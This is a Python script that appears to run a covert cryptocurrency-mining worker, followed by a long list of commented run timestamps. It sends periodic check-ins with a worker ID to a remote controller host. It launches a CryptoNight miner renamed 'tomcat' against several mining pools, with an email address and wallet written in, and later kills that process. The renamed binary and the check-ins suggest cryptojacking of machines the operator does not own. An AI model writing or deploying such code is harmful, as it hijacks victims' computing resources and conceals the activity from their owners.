import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 14:23:05.175456
#2018-02-17 16:09:05.260013
#2018-02-17 17:56:01.580464
#2018-02-17 19:44:02.216318
#2018-02-17 21:32:04.295759
#2018-02-17 23:16:05.700593
#2018-02-18 01:03:06.733036
#2018-02-18 02:51:03.924765
#2018-02-18 04:41:01.610914
#2018-02-18 06:32:07.572739
#2018-02-18 08:20:07.742764
#2018-02-18 10:08:02.166119
#2018-02-18 11:54:07.373203
#2018-02-18 13:40:07.463434
#2018-02-18 15:31:03.880174
#2018-02-18 17:19:06.706896
#2018-02-18 19:08:05.954567
#2018-02-18 20:54:06.177769
#2018-02-18 22:39:07.099989
#2018-02-19 00:28:05.923480
#2018-02-19 02:13:02.223709
#2018-02-19 04:01:02.099162
#2018-02-19 05:45:06.707789
#2018-02-19 07:32:06.981101
#2018-02-19 09:22:06.228101
#2018-02-19 11:12:02.165881
#2018-02-19 12:59:02.093993
#2018-02-19 14:46:11.525098
#2018-02-19 16:34:08.347034
#2018-02-19 18:21:04.069490
#2018-02-19 20:07:03.517290
#2018-02-19 21:56:08.356437
#2018-02-19 23:41:01.723781
#2018-02-20 01:28:01.852890
#2018-02-20 03:16:01.976532
#2018-02-20 05:02:05.682149
#2018-02-20 06:46:07.914615
#2018-02-20 08:32:07.404248
#2018-02-20 10:16:07.066449
#2018-02-20 12:01:09.697054
#2018-02-20 13:47:12.664413
#2018-02-20 15:31:08.866016
#2018-02-20 17:16:01.252323
#2018-02-20 19:05:07.651748
#2018-02-20 20:55:08.176495
#2018-02-20 22:39:07.368094
#2018-02-21 00:22:03.770773
#2018-02-21 02:07:04.723594
#2018-02-21 03:55:08.507546
#2018-02-21 05:43:04.982400
#2018-02-21 07:31:06.486301
#2018-02-21 09:16:04.745096
#2018-02-21 11:04:09.927570
#2018-02-21 12:52:07.476440
#2018-02-21 14:41:06.822820
#2018-02-21 17:34:05.501192
#2018-02-21 19:20:09.044904
#2018-02-21 21:08:01.651207
#2018-02-21 22:55:09.415930
#2018-02-22 00:38:03.904325
#2018-02-22 02:25:07.682729
#2018-02-22 04:12:06.936501
#2018-02-22 05:57:02.180096
#2018-02-22 07:45:07.232857
#2018-02-22 09:35:01.983738
#2018-02-22 11:19:08.854459
#2018-02-22 13:04:10.140766
#2018-02-22 14:53:01.352987
#2018-02-22 16:39:04.078894
#2018-02-22 18:24:05.266195
#2018-02-22 20:16:07.341385
#2018-02-22 22:02:06.068936
#2018-02-22 23:48:08.175739
#2018-02-23 01:37:02.255928
#2018-02-23 03:23:01.828241
#2018-02-23 05:08:07.554996
#2018-02-23 06:54:05.818206
#2018-02-23 08:42:03.942939
#2018-02-23 10:58:06.868998
#2018-02-23 12:55:06.572495
#2018-02-23 14:39:03.928675
#2018-02-23 16:29:02.019736
#2018-02-23 18:16:08.021281
#2018-02-23 20:01:01.292831
#2018-02-23 21:44:01.285126
#2018-02-23 23:40:08.697201
#2018-02-24 01:31:04.384139
#2018-02-24 03:20:05.483968
#2018-02-24 05:06:06.263941
#2018-02-24 06:55:07.148164
#2018-02-24 08:44:07.230786
#2018-02-24 10:38:03.437208
#2018-02-24 12:24:04.143486
#2018-02-24 14:17:07.444754
#2018-02-24 16:04:01.768029
#2018-02-24 17:55:08.576519
#2018-02-24 19:42:05.167042
#2018-02-24 21:29:04.230028
#2018-02-25 01:56:07.239356
#2018-02-25 05:46:01.796190
#2018-02-25 11:37:08.031631